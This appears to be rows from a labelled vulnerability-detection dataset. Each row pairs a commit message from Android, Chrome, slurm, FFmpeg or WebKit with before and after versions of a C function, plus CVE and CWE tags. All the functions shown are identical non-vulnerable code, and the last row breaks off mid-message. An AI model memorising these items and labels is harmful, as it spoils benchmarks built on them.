295c883fe3105b19bcd0f9e07d54c6b589fc5bff
|
DO NOT MERGE Verify OMX buffer sizes prior to access
Bug: 27207275
Change-Id: I4412825d1ee233d993af0a67708bea54304ff62d
|
void SimpleSoftOMXComponent::onPortEnable(OMX_U32 portIndex, bool enable) {
CHECK_LT(portIndex, mPorts.size());
PortInfo *port = &mPorts.editItemAt(portIndex);
CHECK_EQ((int)port->mTransition, (int)PortInfo::NONE);
CHECK(port->mDef.bEnabled == !enable);
if (!enable) {
port->mDef.bEnabled = OMX_FALSE;
port->mTransition = PortInfo::DISABLING;
for (size_t i = 0; i < port->mBuffers.size(); ++i) {
BufferInfo *buffer = &port->mBuffers.editItemAt(i);
if (buffer->mOwnedByUs) {
buffer->mOwnedByUs = false;
if (port->mDef.eDir == OMX_DirInput) {
notifyEmptyBufferDone(buffer->mHeader);
} else {
CHECK_EQ(port->mDef.eDir, OMX_DirOutput);
notifyFillBufferDone(buffer->mHeader);
}
}
}
port->mQueue.clear();
} else {
port->mTransition = PortInfo::ENABLING;
}
checkTransitions();
}
|
void SimpleSoftOMXComponent::onPortEnable(OMX_U32 portIndex, bool enable) {
CHECK_LT(portIndex, mPorts.size());
PortInfo *port = &mPorts.editItemAt(portIndex);
CHECK_EQ((int)port->mTransition, (int)PortInfo::NONE);
CHECK(port->mDef.bEnabled == !enable);
if (!enable) {
port->mDef.bEnabled = OMX_FALSE;
port->mTransition = PortInfo::DISABLING;
for (size_t i = 0; i < port->mBuffers.size(); ++i) {
BufferInfo *buffer = &port->mBuffers.editItemAt(i);
if (buffer->mOwnedByUs) {
buffer->mOwnedByUs = false;
if (port->mDef.eDir == OMX_DirInput) {
notifyEmptyBufferDone(buffer->mHeader);
} else {
CHECK_EQ(port->mDef.eDir, OMX_DirOutput);
notifyFillBufferDone(buffer->mHeader);
}
}
}
port->mQueue.clear();
} else {
port->mTransition = PortInfo::ENABLING;
}
checkTransitions();
}
|
C
|
Android
| 0 |
CVE-2012-5112
|
https://www.cvedetails.com/cve/CVE-2012-5112/
|
CWE-399
|
https://github.com/chromium/chromium/commit/d65b01ca819881a507b5e60c25a2f9caff58cd57
|
d65b01ca819881a507b5e60c25a2f9caff58cd57
|
Wipe out QuotaThreadTask.
This is a one of a series of refactoring patches for QuotaManager.
http://codereview.chromium.org/10872054/
http://codereview.chromium.org/10917060/
BUG=139270
Review URL: https://chromiumcodereview.appspot.com/10919070
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@154987 0039d316-1c4b-4281-b951-d872f2087c98
|
QuotaManager::~QuotaManager() {
proxy_->manager_ = NULL;
std::for_each(clients_.begin(), clients_.end(),
std::mem_fun(&QuotaClient::OnQuotaManagerDestroyed));
if (database_.get())
db_thread_->DeleteSoon(FROM_HERE, database_.release());
}
|
QuotaManager::~QuotaManager() {
proxy_->manager_ = NULL;
std::for_each(clients_.begin(), clients_.end(),
std::mem_fun(&QuotaClient::OnQuotaManagerDestroyed));
if (database_.get())
db_thread_->DeleteSoon(FROM_HERE, database_.release());
}
|
C
|
Chrome
| 0 |
CVE-2016-10030
|
https://www.cvedetails.com/cve/CVE-2016-10030/
|
CWE-284
|
https://github.com/SchedMD/slurm/commit/92362a92fffe60187df61f99ab11c249d44120ee
|
92362a92fffe60187df61f99ab11c249d44120ee
|
Fix security issue in _prolog_error().
Fix security issue caused by insecure file path handling triggered by
the failure of a Prolog script. To exploit this a user needs to
anticipate or cause the Prolog to fail for their job.
(This commit is slightly different from the fix to the 15.08 branch.)
CVE-2016-10030.
|
_send_slurmstepd_init(int fd, int type, void *req,
slurm_addr_t *cli, slurm_addr_t *self,
hostset_t step_hset, uint16_t protocol_version)
{
int len = 0;
Buf buffer = NULL;
slurm_msg_t msg;
uid_t uid = (uid_t)-1;
gid_t gid = (uid_t)-1;
gids_t *gids = NULL;
int rank, proto;
int parent_rank, children, depth, max_depth;
char *parent_alias = NULL;
char *user_name = NULL;
slurm_addr_t parent_addr = {0};
char pwd_buffer[PW_BUF_SIZE];
struct passwd pwd, *pwd_result;
slurm_msg_t_init(&msg);
/* send type over to slurmstepd */
safe_write(fd, &type, sizeof(int));
/* step_hset can be NULL for batch scripts OR if the job was submitted
* by SlurmUser or root using the --no-allocate/-Z option and the job
* job credential validation by _check_job_credential() failed. If the
* job credential did not validate, then it did not come from slurmctld
* and there is no reason to send step completion messages to slurmctld.
*/
if (step_hset == NULL) {
bool send_error = false;
if (type == LAUNCH_TASKS) {
launch_tasks_request_msg_t *launch_req;
launch_req = (launch_tasks_request_msg_t *) req;
if (launch_req->job_step_id != SLURM_EXTERN_CONT)
send_error = true;
}
if (send_error) {
info("task rank unavailable due to invalid job "
"credential, step completion RPC impossible");
}
rank = -1;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
} else if ((type == LAUNCH_TASKS) &&
(((launch_tasks_request_msg_t *)req)->alias_list)) {
/* In the cloud, each task talks directly to the slurmctld
* since node addressing is abnormal */
rank = 0;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
} else {
#ifndef HAVE_FRONT_END
int count;
count = hostset_count(step_hset);
rank = hostset_find(step_hset, conf->node_name);
reverse_tree_info(rank, count, REVERSE_TREE_WIDTH,
&parent_rank, &children,
&depth, &max_depth);
if (rank > 0) { /* rank 0 talks directly to the slurmctld */
int rc;
/* Find the slurm_addr_t of this node's parent slurmd
* in the step host list */
parent_alias = hostset_nth(step_hset, parent_rank);
rc = slurm_conf_get_addr(parent_alias, &parent_addr);
if (rc != SLURM_SUCCESS) {
error("Failed looking up address for "
"NodeName %s", parent_alias);
/* parent_rank = -1; */
}
}
#else
/* In FRONT_END mode, one slurmd pretends to be all
* NodeNames, so we can't compare conf->node_name
* to the NodeNames in step_hset. Just send step complete
* RPC directly to the controller.
*/
rank = 0;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
#endif
}
debug3("slurmstepd rank %d (%s), parent rank %d (%s), "
"children %d, depth %d, max_depth %d",
rank, conf->node_name,
parent_rank, parent_alias ? parent_alias : "NONE",
children, depth, max_depth);
if (parent_alias)
free(parent_alias);
/* send reverse-tree info to the slurmstepd */
safe_write(fd, &rank, sizeof(int));
safe_write(fd, &parent_rank, sizeof(int));
safe_write(fd, &children, sizeof(int));
safe_write(fd, &depth, sizeof(int));
safe_write(fd, &max_depth, sizeof(int));
safe_write(fd, &parent_addr, sizeof(slurm_addr_t));
/* send conf over to slurmstepd */
if (_send_slurmd_conf_lite(fd, conf) < 0)
goto rwfail;
/* send cli address over to slurmstepd */
buffer = init_buf(0);
slurm_pack_slurm_addr(cli, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
/* send self address over to slurmstepd */
if (self) {
buffer = init_buf(0);
slurm_pack_slurm_addr(self, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
} else {
len = 0;
safe_write(fd, &len, sizeof(int));
}
/* Send GRES information to slurmstepd */
gres_plugin_send_stepd(fd);
/* send cpu_frequency info to slurmstepd */
cpu_freq_send_info(fd);
/* send req over to slurmstepd */
switch(type) {
case LAUNCH_BATCH_JOB:
gid = (uid_t)((batch_job_launch_msg_t *)req)->gid;
uid = (uid_t)((batch_job_launch_msg_t *)req)->uid;
user_name = ((batch_job_launch_msg_t *)req)->user_name;
msg.msg_type = REQUEST_BATCH_JOB_LAUNCH;
break;
case LAUNCH_TASKS:
/*
* The validity of req->uid was verified against the
* auth credential in _rpc_launch_tasks(). req->gid
* has NOT yet been checked!
*/
gid = (uid_t)((launch_tasks_request_msg_t *)req)->gid;
uid = (uid_t)((launch_tasks_request_msg_t *)req)->uid;
user_name = ((launch_tasks_request_msg_t *)req)->user_name;
msg.msg_type = REQUEST_LAUNCH_TASKS;
break;
default:
error("Was sent a task I didn't understand");
break;
}
buffer = init_buf(0);
msg.data = req;
if (protocol_version == (uint16_t)NO_VAL)
proto = SLURM_PROTOCOL_VERSION;
else
proto = protocol_version;
msg.protocol_version = (uint16_t)proto;
pack_msg(&msg, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &proto, sizeof(int));
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
#ifdef HAVE_NATIVE_CRAY
/* Try to avoid calling this on a system which is a native
* cray. getpwuid_r is slow on the compute nodes and this has
* in theory been verified earlier.
*/
if (!user_name) {
#endif
/* send cached group ids array for the relevant uid */
debug3("_send_slurmstepd_init: call to getpwuid_r");
if (slurm_getpwuid_r(uid, &pwd, pwd_buffer, PW_BUF_SIZE,
&pwd_result) || (pwd_result == NULL)) {
error("%s: getpwuid_r: %m", __func__);
len = 0;
safe_write(fd, &len, sizeof(int));
errno = ESLURMD_UID_NOT_FOUND;
return errno;
}
debug3("%s: return from getpwuid_r", __func__);
if (gid != pwd_result->pw_gid) {
debug("%s: Changing gid from %d to %d",
__func__, gid, pwd_result->pw_gid);
}
gid = pwd_result->pw_gid;
if (!user_name)
user_name = pwd_result->pw_name;
#ifdef HAVE_NATIVE_CRAY
}
#endif
if (!user_name) {
/* Sanity check since gids_cache_lookup will fail
* with a NULL. */
error("%s: No user name for %d: %m", __func__, uid);
len = 0;
safe_write(fd, &len, sizeof(int));
errno = ESLURMD_UID_NOT_FOUND;
return errno;
}
if ((gids = _gids_cache_lookup(user_name, gid))) {
int i;
uint32_t tmp32;
safe_write(fd, &gids->ngids, sizeof(int));
for (i = 0; i < gids->ngids; i++) {
tmp32 = (uint32_t)gids->gids[i];
safe_write(fd, &tmp32, sizeof(uint32_t));
}
_dealloc_gids(gids);
} else {
len = 0;
safe_write(fd, &len, sizeof(int));
}
return 0;
rwfail:
if (buffer)
free_buf(buffer);
error("_send_slurmstepd_init failed");
return errno;
}
|
_send_slurmstepd_init(int fd, int type, void *req,
slurm_addr_t *cli, slurm_addr_t *self,
hostset_t step_hset, uint16_t protocol_version)
{
int len = 0;
Buf buffer = NULL;
slurm_msg_t msg;
uid_t uid = (uid_t)-1;
gid_t gid = (uid_t)-1;
gids_t *gids = NULL;
int rank, proto;
int parent_rank, children, depth, max_depth;
char *parent_alias = NULL;
char *user_name = NULL;
slurm_addr_t parent_addr = {0};
char pwd_buffer[PW_BUF_SIZE];
struct passwd pwd, *pwd_result;
slurm_msg_t_init(&msg);
/* send type over to slurmstepd */
safe_write(fd, &type, sizeof(int));
/* step_hset can be NULL for batch scripts OR if the job was submitted
* by SlurmUser or root using the --no-allocate/-Z option and the job
* job credential validation by _check_job_credential() failed. If the
* job credential did not validate, then it did not come from slurmctld
* and there is no reason to send step completion messages to slurmctld.
*/
if (step_hset == NULL) {
bool send_error = false;
if (type == LAUNCH_TASKS) {
launch_tasks_request_msg_t *launch_req;
launch_req = (launch_tasks_request_msg_t *) req;
if (launch_req->job_step_id != SLURM_EXTERN_CONT)
send_error = true;
}
if (send_error) {
info("task rank unavailable due to invalid job "
"credential, step completion RPC impossible");
}
rank = -1;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
} else if ((type == LAUNCH_TASKS) &&
(((launch_tasks_request_msg_t *)req)->alias_list)) {
/* In the cloud, each task talks directly to the slurmctld
* since node addressing is abnormal */
rank = 0;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
} else {
#ifndef HAVE_FRONT_END
int count;
count = hostset_count(step_hset);
rank = hostset_find(step_hset, conf->node_name);
reverse_tree_info(rank, count, REVERSE_TREE_WIDTH,
&parent_rank, &children,
&depth, &max_depth);
if (rank > 0) { /* rank 0 talks directly to the slurmctld */
int rc;
/* Find the slurm_addr_t of this node's parent slurmd
* in the step host list */
parent_alias = hostset_nth(step_hset, parent_rank);
rc = slurm_conf_get_addr(parent_alias, &parent_addr);
if (rc != SLURM_SUCCESS) {
error("Failed looking up address for "
"NodeName %s", parent_alias);
/* parent_rank = -1; */
}
}
#else
/* In FRONT_END mode, one slurmd pretends to be all
* NodeNames, so we can't compare conf->node_name
* to the NodeNames in step_hset. Just send step complete
* RPC directly to the controller.
*/
rank = 0;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
#endif
}
debug3("slurmstepd rank %d (%s), parent rank %d (%s), "
"children %d, depth %d, max_depth %d",
rank, conf->node_name,
parent_rank, parent_alias ? parent_alias : "NONE",
children, depth, max_depth);
if (parent_alias)
free(parent_alias);
/* send reverse-tree info to the slurmstepd */
safe_write(fd, &rank, sizeof(int));
safe_write(fd, &parent_rank, sizeof(int));
safe_write(fd, &children, sizeof(int));
safe_write(fd, &depth, sizeof(int));
safe_write(fd, &max_depth, sizeof(int));
safe_write(fd, &parent_addr, sizeof(slurm_addr_t));
/* send conf over to slurmstepd */
if (_send_slurmd_conf_lite(fd, conf) < 0)
goto rwfail;
/* send cli address over to slurmstepd */
buffer = init_buf(0);
slurm_pack_slurm_addr(cli, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
/* send self address over to slurmstepd */
if (self) {
buffer = init_buf(0);
slurm_pack_slurm_addr(self, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
} else {
len = 0;
safe_write(fd, &len, sizeof(int));
}
/* Send GRES information to slurmstepd */
gres_plugin_send_stepd(fd);
/* send cpu_frequency info to slurmstepd */
cpu_freq_send_info(fd);
/* send req over to slurmstepd */
switch(type) {
case LAUNCH_BATCH_JOB:
gid = (uid_t)((batch_job_launch_msg_t *)req)->gid;
uid = (uid_t)((batch_job_launch_msg_t *)req)->uid;
user_name = ((batch_job_launch_msg_t *)req)->user_name;
msg.msg_type = REQUEST_BATCH_JOB_LAUNCH;
break;
case LAUNCH_TASKS:
/*
* The validity of req->uid was verified against the
* auth credential in _rpc_launch_tasks(). req->gid
* has NOT yet been checked!
*/
gid = (uid_t)((launch_tasks_request_msg_t *)req)->gid;
uid = (uid_t)((launch_tasks_request_msg_t *)req)->uid;
user_name = ((launch_tasks_request_msg_t *)req)->user_name;
msg.msg_type = REQUEST_LAUNCH_TASKS;
break;
default:
error("Was sent a task I didn't understand");
break;
}
buffer = init_buf(0);
msg.data = req;
if (protocol_version == (uint16_t)NO_VAL)
proto = SLURM_PROTOCOL_VERSION;
else
proto = protocol_version;
msg.protocol_version = (uint16_t)proto;
pack_msg(&msg, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &proto, sizeof(int));
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
#ifdef HAVE_NATIVE_CRAY
/* Try to avoid calling this on a system which is a native
* cray. getpwuid_r is slow on the compute nodes and this has
* in theory been verified earlier.
*/
if (!user_name) {
#endif
/* send cached group ids array for the relevant uid */
debug3("_send_slurmstepd_init: call to getpwuid_r");
if (slurm_getpwuid_r(uid, &pwd, pwd_buffer, PW_BUF_SIZE,
&pwd_result) || (pwd_result == NULL)) {
error("%s: getpwuid_r: %m", __func__);
len = 0;
safe_write(fd, &len, sizeof(int));
errno = ESLURMD_UID_NOT_FOUND;
return errno;
}
debug3("%s: return from getpwuid_r", __func__);
if (gid != pwd_result->pw_gid) {
debug("%s: Changing gid from %d to %d",
__func__, gid, pwd_result->pw_gid);
}
gid = pwd_result->pw_gid;
if (!user_name)
user_name = pwd_result->pw_name;
#ifdef HAVE_NATIVE_CRAY
}
#endif
if (!user_name) {
/* Sanity check since gids_cache_lookup will fail
* with a NULL. */
error("%s: No user name for %d: %m", __func__, uid);
len = 0;
safe_write(fd, &len, sizeof(int));
errno = ESLURMD_UID_NOT_FOUND;
return errno;
}
if ((gids = _gids_cache_lookup(user_name, gid))) {
int i;
uint32_t tmp32;
safe_write(fd, &gids->ngids, sizeof(int));
for (i = 0; i < gids->ngids; i++) {
tmp32 = (uint32_t)gids->gids[i];
safe_write(fd, &tmp32, sizeof(uint32_t));
}
_dealloc_gids(gids);
} else {
len = 0;
safe_write(fd, &len, sizeof(int));
}
return 0;
rwfail:
if (buffer)
free_buf(buffer);
error("_send_slurmstepd_init failed");
return errno;
}
|
C
|
slurm
| 0 |
CVE-2018-14395
|
https://www.cvedetails.com/cve/CVE-2018-14395/
|
CWE-369
|
https://github.com/FFmpeg/FFmpeg/commit/fa19fbcf712a6a6cc5a5cfdc3254a97b9bce6582
|
fa19fbcf712a6a6cc5a5cfdc3254a97b9bce6582
|
avformat/movenc: Write version 2 of audio atom if channels is not known
The version 1 needs the channel count and would divide by 0
Fixes: division by 0
Fixes: fpe_movenc.c_1108_1.ogg
Fixes: fpe_movenc.c_1108_2.ogg
Fixes: fpe_movenc.c_1108_3.wav
Found-by: #CHEN HONGXU# <HCHEN017@e.ntu.edu.sg>
Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
|
static int mov_write_ctts_tag(AVFormatContext *s, AVIOContext *pb, MOVTrack *track)
{
MOVMuxContext *mov = s->priv_data;
MOVStts *ctts_entries;
uint32_t entries = 0;
uint32_t atom_size;
int i;
ctts_entries = av_malloc_array((track->entry + 1), sizeof(*ctts_entries)); /* worst case */
if (!ctts_entries)
return AVERROR(ENOMEM);
ctts_entries[0].count = 1;
ctts_entries[0].duration = track->cluster[0].cts;
for (i = 1; i < track->entry; i++) {
if (track->cluster[i].cts == ctts_entries[entries].duration) {
ctts_entries[entries].count++; /* compress */
} else {
entries++;
ctts_entries[entries].duration = track->cluster[i].cts;
ctts_entries[entries].count = 1;
}
}
entries++; /* last one */
atom_size = 16 + (entries * 8);
avio_wb32(pb, atom_size); /* size */
ffio_wfourcc(pb, "ctts");
if (mov->flags & FF_MOV_FLAG_NEGATIVE_CTS_OFFSETS)
avio_w8(pb, 1); /* version */
else
avio_w8(pb, 0); /* version */
avio_wb24(pb, 0); /* flags */
avio_wb32(pb, entries); /* entry count */
for (i = 0; i < entries; i++) {
avio_wb32(pb, ctts_entries[i].count);
avio_wb32(pb, ctts_entries[i].duration);
}
av_free(ctts_entries);
return atom_size;
}
|
static int mov_write_ctts_tag(AVFormatContext *s, AVIOContext *pb, MOVTrack *track)
{
MOVMuxContext *mov = s->priv_data;
MOVStts *ctts_entries;
uint32_t entries = 0;
uint32_t atom_size;
int i;
ctts_entries = av_malloc_array((track->entry + 1), sizeof(*ctts_entries)); /* worst case */
if (!ctts_entries)
return AVERROR(ENOMEM);
ctts_entries[0].count = 1;
ctts_entries[0].duration = track->cluster[0].cts;
for (i = 1; i < track->entry; i++) {
if (track->cluster[i].cts == ctts_entries[entries].duration) {
ctts_entries[entries].count++; /* compress */
} else {
entries++;
ctts_entries[entries].duration = track->cluster[i].cts;
ctts_entries[entries].count = 1;
}
}
entries++; /* last one */
atom_size = 16 + (entries * 8);
avio_wb32(pb, atom_size); /* size */
ffio_wfourcc(pb, "ctts");
if (mov->flags & FF_MOV_FLAG_NEGATIVE_CTS_OFFSETS)
avio_w8(pb, 1); /* version */
else
avio_w8(pb, 0); /* version */
avio_wb24(pb, 0); /* flags */
avio_wb32(pb, entries); /* entry count */
for (i = 0; i < entries; i++) {
avio_wb32(pb, ctts_entries[i].count);
avio_wb32(pb, ctts_entries[i].duration);
}
av_free(ctts_entries);
return atom_size;
}
|
C
|
FFmpeg
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/fb83de09f2c986ee91741f3a2776feea0e18e3f6
|
fb83de09f2c986ee91741f3a2776feea0e18e3f6
|
Revert "[Picture in Picture] Call parent function in OnGestureEvent."
This reverts commit e60d9aef9d1eeeff4e5954ba137ed5009261f626.
Reason for revert: Causes the close button to receive gesture events even when it's not the target of the tap. This causes the PiP window to unexpectedly close.
Bug: 895773
Original change's description:
> [Picture in Picture] Call parent function in OnGestureEvent.
>
> Change-Id: I854654be22abd217c3f8ed557bc3fb9118c557c6
> Reviewed-on: https://chromium-review.googlesource.com/1192326
> Reviewed-by: CJ DiMeglio <lethalantidote@chromium.org>
> Commit-Queue: apacible <apacible@chromium.org>
> Cr-Commit-Position: refs/heads/master@{#586820}
# Not skipping CQ checks because original CL landed > 1 day ago.
Change-Id: I2f36d78713f0b811a0a2681e09284c394e146a5c
Reviewed-on: https://chromium-review.googlesource.com/c/1318397
Commit-Queue: Tommy Steimel <steimel@chromium.org>
Reviewed-by: CJ DiMeglio <lethalantidote@chromium.org>
Reviewed-by: Mounir Lamouri <mlamouri@chromium.org>
Cr-Commit-Position: refs/heads/master@{#607039}
|
void OverlayWindowViews::SetUpViews() {
gfx::Rect larger_window_bounds = GetBounds();
larger_window_bounds.Inset(-1, -1);
window_background_view_->SetSize(larger_window_bounds.size());
window_background_view_->SetPaintToLayer(ui::LAYER_SOLID_COLOR);
GetWindowBackgroundLayer()->SetColor(SK_ColorBLACK);
controls_scrim_view_->SetSize(GetBounds().size());
controls_scrim_view_->SetPaintToLayer(ui::LAYER_SOLID_COLOR);
GetControlsScrimLayer()->SetColor(gfx::kGoogleGrey900);
GetControlsScrimLayer()->SetOpacity(0.43f);
controls_parent_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
controls_parent_view_->SetSize(GetBounds().size());
controls_parent_view_->layer()->SetFillsBoundsOpaquely(false);
controls_parent_view_->set_owned_by_client();
close_controls_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
close_controls_view_->layer()->SetFillsBoundsOpaquely(false);
close_controls_view_->set_owned_by_client();
video_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
play_pause_controls_view_->SetImageAlignment(
views::ImageButton::ALIGN_CENTER, views::ImageButton::ALIGN_MIDDLE);
play_pause_controls_view_->SetToggled(controller_->IsPlayerActive());
play_pause_controls_view_->set_owned_by_client();
#if defined(OS_CHROMEOS)
resize_handle_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
resize_handle_view_->layer()->SetFillsBoundsOpaquely(false);
resize_handle_view_->set_owned_by_client();
#endif
play_pause_controls_view_->SetFocusForPlatform(); // Make button focusable.
const base::string16 play_pause_accessible_button_label(
l10n_util::GetStringUTF16(
IDS_PICTURE_IN_PICTURE_PLAY_PAUSE_CONTROL_ACCESSIBLE_TEXT));
play_pause_controls_view_->SetAccessibleName(
play_pause_accessible_button_label);
const base::string16 play_button_label(
l10n_util::GetStringUTF16(IDS_PICTURE_IN_PICTURE_PLAY_CONTROL_TEXT));
play_pause_controls_view_->SetTooltipText(play_button_label);
const base::string16 pause_button_label(
l10n_util::GetStringUTF16(IDS_PICTURE_IN_PICTURE_PAUSE_CONTROL_TEXT));
play_pause_controls_view_->SetToggledTooltipText(pause_button_label);
play_pause_controls_view_->SetInstallFocusRingOnFocus(true);
controls_parent_view_->AddChildView(play_pause_controls_view_.get());
GetContentsView()->AddChildView(controls_scrim_view_.get());
GetContentsView()->AddChildView(controls_parent_view_.get());
GetContentsView()->AddChildView(close_controls_view_.get());
#if defined(OS_CHROMEOS)
GetContentsView()->AddChildView(resize_handle_view_.get());
#endif
UpdatePlayPauseControlsSize();
UpdateControlsVisibility(false);
}
|
void OverlayWindowViews::SetUpViews() {
gfx::Rect larger_window_bounds = GetBounds();
larger_window_bounds.Inset(-1, -1);
window_background_view_->SetSize(larger_window_bounds.size());
window_background_view_->SetPaintToLayer(ui::LAYER_SOLID_COLOR);
GetWindowBackgroundLayer()->SetColor(SK_ColorBLACK);
controls_scrim_view_->SetSize(GetBounds().size());
controls_scrim_view_->SetPaintToLayer(ui::LAYER_SOLID_COLOR);
GetControlsScrimLayer()->SetColor(gfx::kGoogleGrey900);
GetControlsScrimLayer()->SetOpacity(0.43f);
controls_parent_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
controls_parent_view_->SetSize(GetBounds().size());
controls_parent_view_->layer()->SetFillsBoundsOpaquely(false);
controls_parent_view_->set_owned_by_client();
close_controls_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
close_controls_view_->layer()->SetFillsBoundsOpaquely(false);
close_controls_view_->set_owned_by_client();
video_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
play_pause_controls_view_->SetImageAlignment(
views::ImageButton::ALIGN_CENTER, views::ImageButton::ALIGN_MIDDLE);
play_pause_controls_view_->SetToggled(controller_->IsPlayerActive());
play_pause_controls_view_->set_owned_by_client();
#if defined(OS_CHROMEOS)
resize_handle_view_->SetPaintToLayer(ui::LAYER_TEXTURED);
resize_handle_view_->layer()->SetFillsBoundsOpaquely(false);
resize_handle_view_->set_owned_by_client();
#endif
play_pause_controls_view_->SetFocusForPlatform(); // Make button focusable.
const base::string16 play_pause_accessible_button_label(
l10n_util::GetStringUTF16(
IDS_PICTURE_IN_PICTURE_PLAY_PAUSE_CONTROL_ACCESSIBLE_TEXT));
play_pause_controls_view_->SetAccessibleName(
play_pause_accessible_button_label);
const base::string16 play_button_label(
l10n_util::GetStringUTF16(IDS_PICTURE_IN_PICTURE_PLAY_CONTROL_TEXT));
play_pause_controls_view_->SetTooltipText(play_button_label);
const base::string16 pause_button_label(
l10n_util::GetStringUTF16(IDS_PICTURE_IN_PICTURE_PAUSE_CONTROL_TEXT));
play_pause_controls_view_->SetToggledTooltipText(pause_button_label);
play_pause_controls_view_->SetInstallFocusRingOnFocus(true);
controls_parent_view_->AddChildView(play_pause_controls_view_.get());
GetContentsView()->AddChildView(controls_scrim_view_.get());
GetContentsView()->AddChildView(controls_parent_view_.get());
GetContentsView()->AddChildView(close_controls_view_.get());
#if defined(OS_CHROMEOS)
GetContentsView()->AddChildView(resize_handle_view_.get());
#endif
UpdatePlayPauseControlsSize();
UpdateControlsVisibility(false);
}
|
C
|
Chrome
| 0 |
CVE-2018-6034
|
https://www.cvedetails.com/cve/CVE-2018-6034/
|
CWE-125
|
https://github.com/chromium/chromium/commit/3298d3abf47b3a7a10e44c07d821c68a5c8aa935
|
3298d3abf47b3a7a10e44c07d821c68a5c8aa935
|
Tighten about IntRect use in WebGL with overflow detection
BUG=784183
TEST=test case in the bug in ASAN build
R=kbr@chromium.org
Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Change-Id: Ie25ca328af99de7828e28e6a6e3d775f1bebc43f
Reviewed-on: https://chromium-review.googlesource.com/811826
Reviewed-by: Kenneth Russell <kbr@chromium.org>
Commit-Queue: Zhenyao Mo <zmo@chromium.org>
Cr-Commit-Position: refs/heads/master@{#522213}
|
int WebGLRenderingContextBase::ExternallyAllocatedBufferCountPerPixel() {
if (isContextLost())
return 0;
int buffer_count = 1;
buffer_count *= 2; // WebGL's front and back color buffers.
int samples = GetDrawingBuffer() ? GetDrawingBuffer()->SampleCount() : 0;
Nullable<WebGLContextAttributes> attribs;
getContextAttributes(attribs);
if (!attribs.IsNull()) {
if (attribs.Get().antialias() && samples > 0 &&
GetDrawingBuffer()->ExplicitResolveOfMultisampleData()) {
if (attribs.Get().depth() || attribs.Get().stencil())
buffer_count += samples; // depth/stencil multisample buffer
buffer_count += samples; // color multisample buffer
} else if (attribs.Get().depth() || attribs.Get().stencil()) {
buffer_count += 1; // regular depth/stencil buffer
}
}
return buffer_count;
}
|
int WebGLRenderingContextBase::ExternallyAllocatedBufferCountPerPixel() {
if (isContextLost())
return 0;
int buffer_count = 1;
buffer_count *= 2; // WebGL's front and back color buffers.
int samples = GetDrawingBuffer() ? GetDrawingBuffer()->SampleCount() : 0;
Nullable<WebGLContextAttributes> attribs;
getContextAttributes(attribs);
if (!attribs.IsNull()) {
if (attribs.Get().antialias() && samples > 0 &&
GetDrawingBuffer()->ExplicitResolveOfMultisampleData()) {
if (attribs.Get().depth() || attribs.Get().stencil())
buffer_count += samples; // depth/stencil multisample buffer
buffer_count += samples; // color multisample buffer
} else if (attribs.Get().depth() || attribs.Get().stencil()) {
buffer_count += 1; // regular depth/stencil buffer
}
}
return buffer_count;
}
|
C
|
Chrome
| 0 |
CVE-2013-6626
|
https://www.cvedetails.com/cve/CVE-2013-6626/
| null |
https://github.com/chromium/chromium/commit/90fb08ed0146c9beacfd4dde98a20fc45419fff3
|
90fb08ed0146c9beacfd4dde98a20fc45419fff3
|
Cancel JavaScript dialogs when an interstitial appears.
BUG=295695
TEST=See bug for repro steps.
Review URL: https://chromiumcodereview.appspot.com/24360011
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@225026 0039d316-1c4b-4281-b951-d872f2087c98
|
void WebContentsImpl::OnSavePage() {
if (!IsSavable()) {
RecordDownloadSource(INITIATED_BY_SAVE_PACKAGE_ON_NON_HTML);
SaveFrame(GetURL(), Referrer());
return;
}
Stop();
save_package_ = new SavePackage(this);
save_package_->GetSaveInfo();
}
|
void WebContentsImpl::OnSavePage() {
if (!IsSavable()) {
RecordDownloadSource(INITIATED_BY_SAVE_PACKAGE_ON_NON_HTML);
SaveFrame(GetURL(), Referrer());
return;
}
Stop();
save_package_ = new SavePackage(this);
save_package_->GetSaveInfo();
}
|
C
|
Chrome
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/dc3857aac17be72c96f28d860d875235b3be349a
|
dc3857aac17be72c96f28d860d875235b3be349a
|
Unreviewed, rolling out r142736.
http://trac.webkit.org/changeset/142736
https://bugs.webkit.org/show_bug.cgi?id=109716
Broke ABI, nightly builds crash on launch (Requested by ap on
#webkit).
Patch by Sheriff Bot <webkit.review.bot@gmail.com> on 2013-02-13
Source/WebKit2:
* Shared/APIClientTraits.cpp:
(WebKit):
* Shared/APIClientTraits.h:
* UIProcess/API/C/WKPage.h:
* UIProcess/API/gtk/WebKitLoaderClient.cpp:
